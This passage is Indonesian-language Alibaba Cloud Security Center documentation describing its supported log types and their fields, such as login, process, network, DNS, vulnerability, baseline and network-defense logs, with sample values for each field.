Gunakan log Security Center untuk mengidentifikasi dan menanggapi peristiwa keamanan dengan cepat. Setelah membeli penyimpanan log, Security Center secara otomatis mengumpulkan log keamanan yang mencatat peristiwa terkait keamanan serta log host yang melacak aktivitas host. Topik ini menjelaskan jenis log yang didukung beserta field mereka.
Jenis log yang didukung
Jenis log yang didukung oleh edisi berbeda
Setiap edisi Security Center mendukung kemampuan keamanan yang berbeda, sehingga menghasilkan jenis log yang bervariasi. Tabel berikut menunjukkan jenis log yang didukung oleh masing-masing edisi.
Edisi | Jenis log yang didukung |
Anti-virus, Advanced, Enterprise, dan Ultimate |
|
Basic |
|
Tipe log yang didukung untuk fitur bernilai tambah
Saat menggunakan fitur bernilai tambah berikut, Anda tidak perlu membeli edisi berbayar dari Security Center. Cukup aktifkan fitur bernilai tambah yang sesuai. Setelah mengaktifkan fitur-fitur ini dan mengaktifkan analisis log Security Center, tipe log berikut akan didukung:
Log deteksi file jahat
Log deteksi tanpa agen
Log perlindungan aplikasi
Log pemeriksaan baseline CSPM
Log pemeriksaan konfigurasi layanan cloud CSPM
Kategori log
Log host
Tipe log | __topic__ | Deskripsi | Siklus pengumpulan |
aegis-log-login | Mencatat log aktivitas login pengguna ke server, termasuk waktu login, pengguna yang login, metode login, alamat IP login, dan informasi lainnya. Log masuk membantu Anda memantau aktivitas pengguna, mengidentifikasi dan menanggapi perilaku abnormal dengan segera, sehingga memastikan keamanan sistem. Catatan Security Center tidak mendukung pencatatan log masuk untuk sistem operasi Windows Server 2008. | Pengumpulan real-time. | |
aegis-log-network | Mencatat log aktivitas koneksi jaringan, termasuk 5-tupel koneksi server, waktu koneksi, status koneksi, dan informasi lainnya. Log koneksi jaringan membantu Anda menemukan perilaku koneksi abnormal, mengidentifikasi serangan jaringan potensial, mengoptimalkan kinerja jaringan, dll. Catatan
| Pengumpulan real-time. | |
aegis-log-process | Mencatat log terkait startup proses di server, termasuk waktu startup proses, perintah startup, dan parameter. Dengan mencatat dan menganalisis log startup proses, Anda dapat memahami status startup dan informasi konfigurasi proses dalam sistem, mendeteksi aktivitas proses abnormal, intrusi malware, ancaman keamanan, dan masalah lainnya. | Pengumpulan real-time, startup proses dilaporkan segera. | |
aegis-log-crack | Mencatat log perilaku serangan brute-force, termasuk upaya login dan menjebol sistem, aplikasi, atau akun. Dengan mencatat dan menganalisis log serangan brute-force, Anda dapat memahami serangan brute-force pada sistem atau aplikasi, mendeteksi upaya login abnormal, kata sandi lemah, dan kebocoran kredensial. Log serangan brute-force juga dapat digunakan untuk melacak pengguna jahat dan melakukan analisis forensik, membantu tim keamanan dalam penanganan insiden dan investigasi. | Pengumpulan real-time. | |
aegis-snapshot-host | Mencatat log informasi detail akun pengguna dalam sistem atau aplikasi, termasuk atribut dasar akun seperti nama pengguna, kebijakan kata sandi, riwayat login, dll. Dengan membandingkan log snapshot akun pada titik waktu yang berbeda, Anda dapat memahami perubahan dan evolusi akun pengguna serta mendeteksi masalah keamanan akun potensial, seperti akses akun tidak sah, status akun abnormal, dll. |
| |
aegis-snapshot-port | Mencatat log koneksi jaringan, termasuk 5-tupel, status koneksi, dan informasi proses terkait. Dengan mencatat dan menganalisis log snapshot koneksi jaringan, Anda dapat memahami soket jaringan aktif dalam sistem, membantu Anda menemukan perilaku koneksi abnormal, mengidentifikasi serangan jaringan potensial, mengoptimalkan kinerja jaringan, dll. | ||
aegis-snapshot-process | Mencatat log aktivitas proses dalam sistem, termasuk ID proses, nama proses, waktu startup proses, dan informasi lainnya. Dengan mencatat dan menganalisis log snapshot proses, Anda dapat memahami status aktivitas dan penggunaan sumber daya proses dalam sistem, mendeteksi proses abnormal, penggunaan CPU, kebocoran memori, dan masalah lainnya. | ||
aegis-log-dns-query | Mencatat log permintaan kueri DNS, termasuk informasi detail tentang permintaan kueri DNS yang dikirim oleh server, seperti nama domain yang dikueri, tipe kueri, sumber kueri, dan informasi lainnya. Dengan menganalisis log permintaan DNS, Anda dapat memahami aktivitas kueri DNS dalam jaringan, mendeteksi perilaku kueri abnormal, pembajakan domain, keracunan DNS, dan masalah lainnya. Catatan Untuk server Linux dengan versi kernel lebih rendah dari seri 4.X.X, Security Center tidak mendukung pengumpulan log permintaan DNS dan deteksi perilaku DNS jahat. Disarankan agar Anda mempertimbangkan untuk meningkatkan kernel sistem ke versi yang lebih tinggi untuk mendapatkan kemampuan deteksi ancaman yang komprehensif. | Pengumpulan real-time. | |
aegis-log-client | Mencatat peristiwa online dan offline dari agen Security Center. | Pengumpulan real-time. |
Tipe log keamanan
Tipe log | __topic__ | Deskripsi | Siklus pengumpulan |
sas-vul-log | Mencatat log informasi terkait kerentanan yang ditemukan dalam sistem atau aplikasi, termasuk nama kerentanan, status kerentanan, tindakan penanganan, dan informasi lainnya. Dengan mencatat dan menganalisis log kerentanan, Anda dapat memahami kerentanan dalam sistem, risiko keamanan, dan tren serangan, serta mengambil langkah perbaikan yang tepat secara tepat waktu. | Pengumpulan real-time. | |
sas-hc-log | Mencatat log hasil pemeriksaan risiko baseline, termasuk tingkat baseline, kategori baseline, tingkat risiko, dan informasi lainnya. Dengan mencatat dan menganalisis log risiko baseline, Anda dapat memahami status keamanan baseline dan risiko potensial sistem. Catatan Hanya mencatat data untuk item pemeriksaan yang gagal untuk pertama kali, dan data untuk item pemeriksaan yang sebelumnya lulus tetapi gagal saat pemeriksaan ulang. | ||
sas-security-log | Mencatat log peristiwa keamanan dan informasi peringatan yang terjadi dalam sistem atau aplikasi, termasuk sumber data peringatan, detail peringatan, tingkat peringatan, dan informasi lainnya. Dengan mencatat dan menganalisis log peringatan keamanan, Anda dapat memahami peristiwa keamanan dan ancaman dalam sistem dan mengambil langkah respons yang sesuai secara tepat waktu. | ||
sas-cspm-log | Mencatat log terkait manajemen postur keamanan cloud, termasuk hasil pemeriksaan, operasi daftar putih, dan informasi lainnya dari manajemen postur keamanan cloud. Dengan mencatat dan menganalisis log manajemen postur keamanan cloud, Anda dapat memahami masalah konfigurasi dan risiko keamanan potensial dalam platform cloud. | ||
sas-net-block | Mencatat log peristiwa serangan jaringan, termasuk tipe serangan, alamat IP sumber, alamat IP target, dan informasi kunci lainnya. Dengan mencatat dan menganalisis log pertahanan jaringan, Anda dapat memahami peristiwa keamanan yang terjadi dalam jaringan, dan kemudian mengambil langkah respons dan pertahanan yang sesuai untuk meningkatkan keamanan dan keandalan jaringan. | ||
sas-rasp-log | Mencatat log informasi peringatan serangan dari fitur perlindungan aplikasi, termasuk tipe serangan, data perilaku, IP penyerang, dan informasi kunci lainnya. Dengan mencatat dan menganalisis log peringatan perlindungan aplikasi, Anda dapat memahami peristiwa keamanan yang terjadi dalam aplikasi, dan kemudian mengambil langkah respons dan pertahanan yang sesuai untuk meningkatkan keamanan dan keandalan aplikasi. | ||
sas-filedetect-log | Mencatat log deteksi file jahat menggunakan fitur SDK deteksi file jahat, termasuk informasi file, skenario deteksi, hasil deteksi, dan informasi lainnya untuk deteksi file jahat. Dengan mencatat dan menganalisis log deteksi file jahat, Anda dapat mengidentifikasi virus umum dalam file offline dan file Alibaba Cloud OSS, seperti ransomware, program penambangan, dll., dan menanganinya dengan segera untuk mencegah penyebaran dan eksekusi file jahat. | ||
aegis-file-protect-log | Mencatat peristiwa peringatan yang terdeteksi menggunakan fitur pemantauan file inti, termasuk jalur file, operasi yang dilakukan pada file, tingkat peringatan, dan informasi lainnya. Dengan mencatat dan menganalisis log peristiwa pemantauan file inti, Anda dapat memantau apakah file inti dicuri atau dirusak. | ||
sas-agentless-log | Mencatat risiko keamanan yang terdeteksi dalam Elastic Compute Service (ECS), dan gambar menggunakan fitur deteksi tanpa agen, termasuk kerentanan, baseline, sampel jahat, dan file sensitif. Dengan mencatat dan menganalisis log deteksi tanpa agen, Anda dapat melihat risiko keamanan dalam aset selama periode waktu yang berbeda, membantu Anda mengidentifikasi dan menangani ancaman potensial. |
Log jaringan (tidak lagi didukung untuk pengiriman)
Mulai 27 Maret 2025, fitur analisis log tidak lagi mendukung pengiriman log jaringan, termasuk log akses web, log DNS, log sesi jaringan, dan log DNS lokal. Untuk solusi alternatif terkait log jaringan, lihat Solusi Alternatif untuk Menambahkan atau Mengirimkan Log Jaringan.
Jika Anda telah mengaktifkan pengiriman log jaringan, layanan ini akan berakhir pada 27 Maret 2025, dan data log jaringan baru tidak akan dikirimkan lagi. Fungsi kueri untuk log jaringan di halaman Log Analysis pada konsol Security Center akan dihentikan.
Untuk menanyakan log jaringan yang telah dikirimkan, klik Advanced Management of Simple Log Service di pojok kanan atas halaman Log Analysis untuk membuka konsol Simple Log Service. Gunakan deskripsi field log di lampiran untuk melihat log jaringan yang telah dikirimkan.
Jenis log | __topic__ | Deskripsi | Siklus pengumpulan |
sas-log-http | Log permintaan pengguna ke server web dan respons dari server web, termasuk alamat IP pengguna, waktu permintaan, metode permintaan, URL permintaan, kode status HTTP, dan ukuran respons. Log akses web digunakan untuk menganalisis lalu lintas web dan perilaku pengguna, mengidentifikasi pola akses dan anomali, serta mengoptimalkan kinerja situs web. | Pada umumnya, log dikumpulkan 1 hingga 12 jam setelah log dihasilkan. | |
sas-log-dns | Log detail resolusi DNS, termasuk nama domain yang diminta, tipe kueri, alamat IP klien, dan nilai respons. Anda dapat memantau proses permintaan dan respons resolusi DNS, serta mengidentifikasi perilaku resolusi abnormal, pembajakan DNS, dan keracunan DNS berdasarkan log DNS. | ||
sas-log-session | Log koneksi jaringan dan transmisi data, termasuk detail sesi jaringan. Detail tersebut mencakup waktu mulai sesi, alamat IP sumber, alamat IP tujuan, protokol, dan port. Log sesi jaringan umumnya digunakan untuk memantau lalu lintas jaringan, mengidentifikasi ancaman potensial, dan mengoptimalkan kinerja jaringan. | ||
local-dns | Log kueri dan respons DNS pada server DNS lokal, termasuk nama domain yang diminta, tipe kueri, alamat IP klien, dan nilai respons. Anda dapat memperoleh informasi tentang kueri DNS di jaringan Anda, dan mengidentifikasi masalah seperti perilaku kueri abnormal, pembajakan domain, dan keracunan DNS berdasarkan log DNS internal. |
Kategori log host
Log masuk
Nama field | Deskripsi | Contoh |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
sas_group_name | Grup aset tempat server termasuk di Security Center. | default |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | Alamat IP yang digunakan untuk masuk ke server. | 221.11.XX.XX |
dst_port | Port yang digunakan untuk masuk ke server. | 22 |
login_type | Tipe login. Nilai valid termasuk nilai-nilai berikut:
| SSH |
username | Nama pengguna yang digunakan untuk login. | admin |
login_count | Jumlah percobaan login. Percobaan login berulang dalam 1 menit dicatat dalam satu log. Sebagai contoh, jika nilai field | 3 |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log koneksi jaringan
Nama field | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | Indeks rantai proses. Anda dapat menggunakan indeks untuk mencari rantai proses. | B184 |
container_hostname | Nama server di dalam kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID image. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama image. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses di dalam kontainer. | 0 |
net_connect_dir | Arah koneksi jaringan. Nilai valid:
| in |
dst_ip | Alamat IP tujuan.
| 192.168.XX.XX |
dst_port | Port tujuan. | 443 |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_proc_name | Nama file proses induk. | /usr/bin/bash |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_name | Nama proses. | nginx |
proc_path | Path lengkap ke file proses. | /usr/local/nginx/sbin/nginx |
proc_start_time | Waktu proses dimulai. | N/A |
jenis_koneksi | Protokol. Nilai yang valid:
| tcp |
sas_group_name | Grup aset tempat server termasuk di Security Center. | default |
src_ip | Alamat IP sumber. | 100.127.XX.XX |
src_port | Port sumber. | 41.897 |
srv_comm | Nama perintah yang terkait dengan proses induk dari proses induk. | containerd-shim |
status | Status koneksi jaringan. Nilai yang valid:
| 5 |
tipe | Tipe koneksi jaringan real-time. Nilai yang valid:
| listen |
uid | ID pengguna yang memulai proses tersebut. | 101 |
nama pengguna | Nama pengguna yang memulai proses tersebut. | root |
uuid | UUID dari server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1719472214 |
Log startup proses
Nama field | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | Indeks dari rantai proses. Anda dapat menggunakan indeks untuk mencari rantai proses. | B184 |
cmd_index | Indeks dari parameter di baris perintah. Setiap dua indeks dikelompokkan untuk mengidentifikasi awal dan akhir dari sebuah parameter. | 0,3,5,8 |
cmdline | Perintah lengkap untuk memulai proses. | ipset list KUBE-6-CLUSTER-IP |
comm | Nama perintah yang terkait dengan proses. | N/A |
container_hostname | Nama server di dalam kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID gambar. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama gambar. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses di dalam kontainer. | 0 |
cwd | Direktori kerja saat ini (CWD) dari proses. | N/A |
proc_name | Nama file proses. | ipset |
proc_path | Jalur lengkap ke file proses. | /usr/sbin/ipset |
gid | ID grup proses. | 0 |
groupname | Nama grup pengguna. | group1 |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_cmd_line | Baris perintah dari proses induk. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | Nama file proses induk. | kube-proxy |
parent_proc_path | Jalur lengkap ke file proses induk. | /usr/local/bin/kube-proxy |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_start_time | Waktu ketika proses dimulai. | 2024-08-01 16:45:40 |
parent_proc_start_time | Waktu ketika proses induk dimulai. | 2024-07-12 19:45:19 |
sas_group_name | Grup aset tempat server termasuk di Security Center. | default |
srv_cmd | Baris perintah dari proses leluhur. | /usr/bin/containerd |
tty | Terminal yang digunakan untuk masuk. Nilai N/A menunjukkan bahwa akun belum digunakan untuk masuk terminal. | N/A |
uid | ID pengguna. | 123 |
username | Nama pengguna yang memulai proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1719472214 |
Log serangan brute-force
Nama bidang | Deskripsi | Contoh |
instance_id | ID dari instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang sedang mengalami serangan brute-force. | 192.168.XX.XX |
sas_group_name | Grup aset tempat server termasuk dalam Security Center. | default |
uuid | UUID dari server yang sedang mengalami serangan brute-force. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | Jumlah percobaan logon gagal. Percobaan logon berulang dalam 1 menit dicatat dalam satu log. Sebagai contoh, jika nilai dari bidang | 3 |
src_ip | Alamat IP sumber. | 47.92.XX.XX |
dst_port | Port logon. | 22 |
login_type | Tipe logon. Nilai valid:
| SSH |
username | Nama pengguna yang digunakan untuk logon. | user |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log snapshot akun
Nama bidang | Deskripsi | Contoh |
account_expire | Tanggal kedaluwarsa akun. Nilai never menunjukkan bahwa akun tidak pernah kedaluwarsa. | never |
domain | Domain atau direktori tempat akun berada. Nilai N/A menunjukkan bahwa akun tidak termasuk dalam domain. | N/A |
groups | Grup tempat akun berada. Nilai N/A menunjukkan bahwa akun tidak termasuk dalam grup. | ["nscd"] |
home_dir | Direktori home, yaitu direktori default untuk menyimpan dan mengelola file di sistem. | /Users/abc |
instance_id | ID dari instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
last_chg | Tanggal terakhir kali kata sandi diubah. | 2022-11-29 |
last_logon | Tanggal dan waktu logon terakhir yang dilakukan menggunakan akun. Nilai N/A menunjukkan bahwa akun belum digunakan untuk logon. | 2023-08-18 09:21:21 |
login_ip | Alamat IP dari mana logon jarak jauh terakhir dilakukan menggunakan akun. Nilai N/A menunjukkan bahwa akun belum digunakan untuk logon. | 192.168.XX.XX |
passwd_expire | Tanggal kedaluwarsa kata sandi. Nilai never menunjukkan bahwa kata sandi tidak pernah kedaluwarsa. | 2024-08-24 |
perm | Menunjukkan apakah akun memiliki izin root. Nilai valid:
| 0 |
sas_group_name | Grup aset tempat server berada di Security Center. | default |
shell | Perintah shell Linux. | /sbin/nologin |
status | Status akun. Nilai valid:
| 0 |
tty | Terminal yang masuk ke dalamnya. Nilai N/A menunjukkan bahwa akun belum digunakan untuk logon terminal. | N/A |
username | Nama pengguna. | nscd |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | Tanggal ketika Anda diberitahu tentang kata sandi yang akan kedaluwarsa. Nilai never menunjukkan bahwa tidak ada pemberitahuan yang dikirim. | 2024-08-20 |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log snapshot jaringan
Nama bidang | Deskripsi | Contoh |
net_connect_dir | Arah koneksi jaringan. Nilai yang valid:
| in |
dst_ip | Alamat IP tujuan.
| 192.168.XX.XX |
dst_port | Port tujuan. | 443 |
instance_id | ID dari instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
pid | ID dari proses. | 682 |
proc_name | Nama dari proses. | sshd |
connection_type | Protokol. Nilai yang valid:
| tcp4 |
sas_group_name | Grup aset tempat server termasuk dalam Security Center. | default |
src_ip | Alamat IP sumber. | 100.127.XX.XX |
src_port | Port sumber. | 41897 |
status | Status koneksi jaringan. Nilai yang valid:
| 5 |
uuid | UUID dari server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1719472214 |
Log snapshot proses
Nama field | Deskripsi | Contoh |
cmdline | Perintah lengkap untuk memulai proses. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | ID dari instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
md5 | Nilai hash MD5 dari file biner. Catatan Algoritma MD5 tidak didukung untuk file yang ukurannya melebihi 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | Nama file proses. | assist_daemon |
proc_path | Jalur lengkap ke file proses. | /usr/local/share/assist-daemon/assist_daemon |
pid | ID dari proses. | 1.692 |
pname | Nama file proses induk. | systemd |
sas_group_name | Grup aset tempat server termasuk di Security Center. | default |
proc_start_time | Waktu ketika proses dimulai. Ini adalah field bawaan. | 2023-08-18 20:00:12 |
uid | ID pengguna yang memulai proses. | 101 |
username | Nama pengguna yang memulai proses. | root |
uuid | UUID dari server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1.719.472.214 |
Log permintaan DNS
Nama bidang | Deskripsi | Contoh |
domain | Nama domain yang termasuk dalam permintaan DNS. | example.aliyundoc.com |
instance_id | ID dari instance. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP dari server yang memulai permintaan DNS. | 192.168.XX.XX |
pid | ID dari proses yang memulai permintaan DNS. | 3544 |
ppid | ID dari proses induk yang memulai permintaan DNS. | 3408 |
cmd_chain | Rantai proses yang memulai permintaan DNS. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | Baris perintah dari proses yang memulai permintaan DNS. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | Jalur ke proses yang memulai permintaan DNS. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | Grup aset tempat server tersebut berada di Security Center. | default |
time | Waktu ketika permintaan DNS ditangkap. Dalam banyak kasus, nilainya adalah saat permintaan DNS dimulai. | 2023-08-17 20:05:04 |
uuid | UUID dari server yang memulai permintaan DNS. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log peristiwa agen
Nama bidang | Deskripsi | Contoh |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
agent_version | Versi agen Security Center. | aegis_11_91 |
last_login | Cap waktu login terakhir. Satuan: milidetik. | 1716444387617 |
platform | Jenis sistem operasi. Nilai yang valid:
| linux |
region_id | ID wilayah tempat server berada. | cn-beijing |
status | Status agen Security Center. Nilai yang valid:
| online |
start_time | Cap waktu mulai, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log field keamanan
Log kerentanan
Nama field | Deskripsi | Contoh |
vul_alias_name | Alias dari kerentanan. | CESA-2023:1335: openssl Security Update |
risk_level | Tingkat risiko. Nilai valid:
| later |
extend_content | Informasi tambahan tentang kerentanan. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik host. | 39.104.XX.XX |
intranet_ip | Alamat IP privat host. | 192.168.XX.XX |
instance_name | Nama host. | hhht-linux-*** |
vul_name | Nama kerentanan. | centos:7:cesa-2023:1335 |
operation | Operasi pada kerentanan. Nilai valid:
| new |
status | Informasi status. Nilai valid:
| 1 |
tag | Tag yang ditambahkan ke kerentanan. Nilai valid:
| oval |
type | Jenis kerentanan. Nilai valid:
| sys |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log CSPM-baseline
Nama field | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Setel interval terpendek antara perubahan kata sandi |
check_item_level | Tingkat risiko baseline. Nilai valid:
| medium |
check_type | Jenis item pemeriksaan. | Otentikasi identitas |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
risk_level | Tingkat keparahan item risiko. Nilai valid:
| medium |
operation | Operasi. Nilai valid:
| new |
risk_name | Nama item risiko. | Pemeriksaan kepatuhan kata sandi |
sas_group_name | Grup server tempat server berada di Pusat Keamanan. Item risiko terdeteksi pada server tersebut. | default |
status | Informasi status. Nilai valid:
| 1 |
sub_type_alias_name | Alias subtype dalam bahasa Cina. | Praktik Terbaik Internasional untuk Keamanan - Ubuntu 16/18/20/22 Pemeriksaan Baseline Keamanan |
sub_type_name | Nama subtype. Untuk informasi lebih lanjut tentang subtype baseline, lihat Jenis dan subtype baseline. | hc_ubuntu16_cis_rules |
type_alias_name | Alias tipe pemeriksaan dalam bahasa Cina. | Praktik Terbaik Internasional untuk Keamanan |
type_name | Tipe baseline. Untuk informasi lebih lanjut tentang tipe baseline, lihat Jenis dan subtype baseline. | cis |
uuid | UUID server tempat item risiko terdeteksi. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log peringatan keamanan
Nama field | Deskripsi | Contoh |
data_source | Sumber data. Nilai valid:
| aegis_login_log |
detail | Detail peringatan. Catatan Nilai field detail dalam log bervariasi berdasarkan jenis peringatan. Jika Anda memiliki pertanyaan tentang parameter dalam field detail saat melihat log peringatan, Anda dapat mengirimkan tiket untuk menghubungi dukungan teknis. | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon ke instance ECS menggunakan akun tidak biasa","status":0} |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik host. | 39.104.XX.XX |
intranet_ip | Alamat IP privat host. | 192.168.XX.XX |
level | Tingkat risiko peringatan. Nilai valid:
| suspicious |
name | Nama peringatan. | Login Tidak Biasa - Masuk ke instance ECS menggunakan akun tidak biasa |
operation | Operasi. Nilai valid:
| new |
status | Informasi status. Nilai valid:
| 1 |
informasi_unik | UUID peringatan. | 2536dd765f804916a1fa3b9516b5**** |
uuid | UUID server tempat peringatan dihasilkan. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
CSPM - Log pemeriksaan konfigurasi platform cloud
Nama field | Deskripsi | Contoh |
check_id | ID item pemeriksaan. Anda dapat memanggil operasi ListCheckResult untuk menanyakan ID item pemeriksaan. Operasi ini digunakan untuk menanyakan detail item risiko yang terdeteksi dalam pemeriksaan konfigurasi layanan cloud. | 11 |
check_item_name | Nama item pemeriksaan. | Pengaturan kembali ke asal |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
instance_name | Nama instance. | lsm |
instance_result | Dampak risiko. Nilainya adalah string JSON. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Nama Instance","type":"text"}]} |
instance_sub_type | Subtipe instance. Nilai valid:
| INSTANCE |
instance_type | Tipe instance. Nilai valid:
| ECS |
region_id | ID wilayah instance. | cn-hangzhou |
requirement_id | ID item persyaratan. Anda dapat memanggil operasi ListCheckStandard untuk menanyakan ID item persyaratan. Operasi ini digunakan untuk menanyakan standar pemeriksaan konfigurasi. | 5 |
risk_level | Tingkat risiko. Nilai valid:
| MEDIUM |
section_id | ID bagian. Anda dapat memanggil operasi ListCheckResult untuk menanyakan ID bagian. | 1 |
standard_id | ID standar. Anda dapat memanggil operasi ListCheckStandard untuk menanyakan ID standar. | 1 |
status | Status item pemeriksaan. Nilai valid:
| PASS |
vendor | Penyedia layanan cloud. Nilainya tetap sebagai ALIYUN. | ALIYUN |
start_time | Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log pertahanan jaringan
Nama field | Deskripsi | Contoh |
cmd | Baris perintah proses yang diserang. | nginx: master process nginx |
cur_time | Waktu terjadinya peristiwa serangan. | 2023-09-14 09:21:59 |
decode_payload | Payload heksadesimal yang didekode. | POST /Services/FileService/UserFiles/ |
dst_ip | Alamat IP aset yang diserang. | 172.16.XX.XX |
dst_port | Port dari aset yang diserang. | 80 |
fungsi | Jenis peristiwa yang diblokir. Nilai valid:
| payload |
rule_type | Tipe aturan yang digunakan dalam peristiwa yang diblokir. Nilai valid:
| alinet_payload |
instance_id | ID instance dari aset yang diserang. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik dari aset yang diserang. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi dari aset yang diserang. | 192.168.XX.XX |
final_action | Tindakan pertahanan. Nilai ini tetap sebagai block. Nilai tersebut menunjukkan bahwa serangan telah diblokir. | block |
payload | Payload heksadesimal. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | ID proses yang diserang. | 7107 |
platform | Tipe sistem operasi.
| linux |
proc_path | Jalur menuju proses yang diserang. | /usr/sbin/nginx |
sas_group_name | Grup aset tempat server tersebut berada di Security Center. | default |
src_ip | Alamat IP sumber dari serangan. | 106.11.XX.XX |
src_port | Port sumber dari serangan. | 29.575 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
waktu_mulai | Stempel waktu awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1.719.472.214 |
Log perlindungan aplikasi
Nama bidang | Deskripsi | Contoh |
app_dir | Direktori tempat aplikasi disimpan. | /usr/local/aegis/rasp/apps/1111 |
